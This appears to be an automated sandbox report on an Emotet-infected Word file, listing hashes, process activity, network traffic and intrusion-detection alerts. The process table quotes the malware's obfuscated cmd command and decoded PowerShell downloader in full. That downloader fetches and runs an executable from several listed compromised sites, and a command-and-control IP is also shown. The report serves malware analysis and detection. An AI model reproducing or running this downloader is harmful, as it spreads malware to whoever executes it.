File name: | ATTBusiness_12_18_18.doc |
Full analysis: | https://app.any.run/tasks/30a47721-fc78-4863-8b00-d99eb739fb38 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | December 18, 2018, 20:08:20 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Dec 18 17:28:00 2018, Last Saved Time/Date: Tue Dec 18 17:28:00 2018, Number of Pages: 1, Number of Words: 5, Number of Characters: 33, Security: 0 |
MD5: | 91497600F2EA438C4C54C211CD2FB85A |
SHA1: | E2C66857F627451ED2D8476CCAC8672573400325 |
SHA256: | 4DFC338ADC4731EA90DFCF9DD37546081AB4AC95872FC150CC5608C8FAFF0C57 |
SSDEEP: | 3072:g0nbUh0eeTswVj8GhDS0o9zTGOZD6EbzCdyyjNmXZI:XRoUOZDlbeyyj4XZI |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
Title: | - |
---|---|
Subject: | - |
Author: | - |
Keywords: | - |
Comments: | - |
Template: | Normal.dotm |
LastModifiedBy: | - |
RevisionNumber: | 1 |
Software: | Microsoft Office Word |
TotalEditTime: | - |
CreateDate: | 2018:12:18 17:28:00 |
ModifyDate: | 2018:12:18 17:28:00 |
Pages: | 1 |
Words: | 5 |
Characters: | 33 |
Security: | None |
CodePage: | Windows Latin 1 (Western European) |
Company: | - |
Lines: | 1 |
Paragraphs: | 1 |
CharCountWithSpaces: | 37 |
AppVersion: | 16 |
ScaleCrop: | No |
LinksUpToDate: | No |
SharedDoc: | No |
HyperlinksChanged: | No |
TitleOfParts: | - |
HeadingPairs: |
|
CompObjUserTypeLen: | 32 |
CompObjUserType: | Microsoft Word 97-2003 Document |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
3220 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\ATTBusiness_12_18_18.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
2604 | c:\o7555563226081\t2569490548\D569888924\..\..\..\windows\system32\cmd.exe /c %pROgRAMData:~0,1%%PRoGrAmDAta:~9,2% /v:o /c " SeT wo=;'640d'=689t$}}{hctac}};kaerb;'181Z'=140w$;135M$ metI-ekovnI{ )00008 eg- htgnel.)135M$ metI-teG(( fI;'189C'=952V$;)135M$ ,574M$(eliFdaolnwoD.842V${yrt{)310s$ ni 574M$(hcaerof;'exe.'+381F$+'\'+pmet:vne$=135M$;'577U'=004f$;'884' = 381F$;'929X'=302Q$;)'@'(tilpS.'CH43_kOq/eg.ytre-labolg.www//:ptth@ipAYvqb_I5GWNKHW/moc.cjotutitsni.www//:ptth@R9nsKFn_pKyIYFdi/ua.moc.htlaeherocne.www//:ptth@plXkk_N0iP9A/moc.gnihgnuhcgnok.www//:ptth@0rdDd1sNp_GrUVnB/moc.esikram-egitrewhcoh.www//:ptth'=310s$;tneilCbeW.teN tcejbo-wen=842V$;'745I'=300z$ ll%1,3-~:PMET%h%1,4-~:EMANNOISSES%r%1,5~:CILBUP%wop&& For /l %A iN ( 582 -1 0) Do SeT WwRT=!WwRT!!wo:~ %A, 1!&&iF %A == 0 eCHO !WwRT:~6! | CM%os:~-7,-6% " | c:\windows\system32\cmd.exe | — | WINWORD.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3196 | CmD /v:o /c " SeT wo=;'640d'=689t$}}{hctac}};kaerb;'181Z'=140w$;135M$ metI-ekovnI{ )00008 eg- htgnel.)135M$ metI-teG(( fI;'189C'=952V$;)135M$ ,574M$(eliFdaolnwoD.842V${yrt{)310s$ ni 574M$(hcaerof;'exe.'+381F$+'\'+pmet:vne$=135M$;'577U'=004f$;'884' = 381F$;'929X'=302Q$;)'@'(tilpS.'CH43_kOq/eg.ytre-labolg.www//:ptth@ipAYvqb_I5GWNKHW/moc.cjotutitsni.www//:ptth@R9nsKFn_pKyIYFdi/ua.moc.htlaeherocne.www//:ptth@plXkk_N0iP9A/moc.gnihgnuhcgnok.www//:ptth@0rdDd1sNp_GrUVnB/moc.esikram-egitrewhcoh.www//:ptth'=310s$;tneilCbeW.teN tcejbo-wen=842V$;'745I'=300z$ ll%1,3-~:PMET%h%1,4-~:EMANNOISSES%r%1,5~:CILBUP%wop&& For /l %A iN ( 582 -1 0) Do SeT WwRT=!WwRT!!wo:~ %A, 1!&&iF %A == 0 eCHO !WwRT:~6! | CMd " | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3380 | C:\Windows\system32\cmd.exe /S /D /c" eCHO pow%PUBLIC:~5,1%r%SESSIONNAME:~-4,1%h%TEMP:~-3,1%ll $z003='I547';$V248=new-object Net.WebClient;$s013='http://www.hochwertige-markise.com/BnVUrG_pNs1dDdr0@http://www.kongchunghing.com/A9Pi0N_kkXlp@http://www.encorehealth.com.au/idFYIyKp_nFKsn9R@http://www.institutojc.com/WHKNWG5I_bqvYApi@http://www.global-erty.ge/qOk_34HC'.Split('@');$Q203='X929';$F183 = '488';$f400='U775';$M531=$env:temp+'\'+$F183+'.exe';foreach($M475 in $s013){try{$V248.DownloadFile($M475, $M531);$V259='C981';If ((Get-Item $M531).length -ge 80000) {Invoke-Item $M531;$w041='Z181';break;}}catch{}}$t986='d046'; " | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3476 | CMd | C:\Windows\system32\cmd.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3872 | powershell $z003='I547';$V248=new-object Net.WebClient;$s013='http://www.hochwertige-markise.com/BnVUrG_pNs1dDdr0@http://www.kongchunghing.com/A9Pi0N_kkXlp@http://www.encorehealth.com.au/idFYIyKp_nFKsn9R@http://www.institutojc.com/WHKNWG5I_bqvYApi@http://www.global-erty.ge/qOk_34HC'.Split('@');$Q203='X929';$F183 = '488';$f400='U775';$M531=$env:temp+'\'+$F183+'.exe';foreach($M475 in $s013){try{$V248.DownloadFile($M475, $M531);$V259='C981';If ((Get-Item $M531).length -ge 80000) {Invoke-Item $M531;$w041='Z181';break;}}catch{}}$t986='d046'; | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | cmd.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3100 | "C:\Users\admin\AppData\Local\Temp\488.exe" | C:\Users\admin\AppData\Local\Temp\488.exe | — | powershell.exe |
User: admin Company: Microsoft Corporati Integrity Level: MEDIUM Description: Thai Pattachote (non-ShiftLock) Keyboa Exit code: 0 | ||||
3808 | "C:\Users\admin\AppData\Local\Temp\488.exe" | C:\Users\admin\AppData\Local\Temp\488.exe | 488.exe | |
User: admin Company: Microsoft Corporati Integrity Level: MEDIUM Description: Thai Pattachote (non-ShiftLock) Keyboa Exit code: 0 | ||||
3556 | "C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe" | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | — | 488.exe |
User: admin Company: Microsoft Corporati Integrity Level: MEDIUM Description: Thai Pattachote (non-ShiftLock) Keyboa Exit code: 0 | ||||
4052 | "C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe" | C:\Users\admin\AppData\Local\archivesymbol\archivesymbol.exe | archivesymbol.exe | |
User: admin Company: Microsoft Corporati Integrity Level: MEDIUM Description: Thai Pattachote (non-ShiftLock) Keyboa |
PID | Process | Filename | Type | |
---|---|---|---|---|
3220 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR57B6.tmp.cvr | — | |
MD5:— | SHA256:— | |||
3220 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\56E487A3.wmf | — | |
MD5:— | SHA256:— | |||
3220 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\CE5D84A9.wmf | — | |
MD5:— | SHA256:— | |||
3872 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\MY7E1WNHZGHXHWHGW8PK.temp | — | |
MD5:— | SHA256:— | |||
3220 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:B92147F350B6247329D23527C873E925 | SHA256:26D657326BFF7F2F3C6A44095266C6E3C89387D8D02CDAF080804632F1AFC00E | |||
3872 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF2467b3.TMP | binary | |
MD5:6073B6FC66D2E68644893344F6904E4A | SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3 | |||
3220 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:938948E1A9B5CCCD41DDF2AE5B1982CC | SHA256:9A49BCF648A150BB931D1B47986FCE304F265A6AFE647CB5300E69AE88CDFA23 | |||
3872 | powershell.exe | C:\Users\admin\AppData\Local\Temp\488.exe | executable | |
MD5:9083D6F31312A1E2588DF73195AE07F6 | SHA256:E1345BB7302FD0AC8BF303B9BB4A2BA426D160C1B9DBCEB15464CB10545E52E6 | |||
3872 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms | binary | |
MD5:6073B6FC66D2E68644893344F6904E4A | SHA256:0F2F61C8DFC3A20C7A5E5133C19BA1493441440E5477254273F28F6F668E64B3 | |||
3220 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D63C0FAA.wmf | wmf | |
MD5:1902BD1D0EE1D11C4CB92A8F96D6CDD7 | SHA256:577E19431A68CA3B4CBB0847822583285AEED4926C464E2ACAA44402317F37AD |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
3872 | powershell.exe | GET | 200 | 85.93.24.120:80 | http://www.hochwertige-markise.com/BnVUrG_pNs1dDdr0/ | DE | executable | 124 Kb | suspicious |
3872 | powershell.exe | GET | 301 | 85.93.24.120:80 | http://www.hochwertige-markise.com/BnVUrG_pNs1dDdr0 | DE | html | 260 b | suspicious |
4052 | archivesymbol.exe | GET | — | 217.173.64.242:443 | http://217.173.64.242:443/ | RU | — | — | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
4052 | archivesymbol.exe | 217.173.64.242:443 | — | OOO WestCall Ltd. | RU | suspicious |
3872 | powershell.exe | 85.93.24.120:80 | www.hochwertige-markise.com | GHOSTnet GmbH | DE | suspicious |
Domain | IP | Reputation |
---|---|---|
www.hochwertige-markise.com |
| suspicious |
PID | Process | Class | Message |
---|---|---|---|
3872 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
3872 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3872 | powershell.exe | Misc activity | ET INFO EXE - Served Attached HTTP |